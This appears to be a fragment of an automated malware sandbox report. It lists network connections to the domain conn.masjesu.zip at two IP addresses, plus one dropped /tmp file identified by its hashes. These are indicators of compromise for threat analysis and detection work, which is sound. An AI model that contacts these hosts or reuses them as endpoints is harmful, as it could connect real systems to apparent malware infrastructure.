| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
Files
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |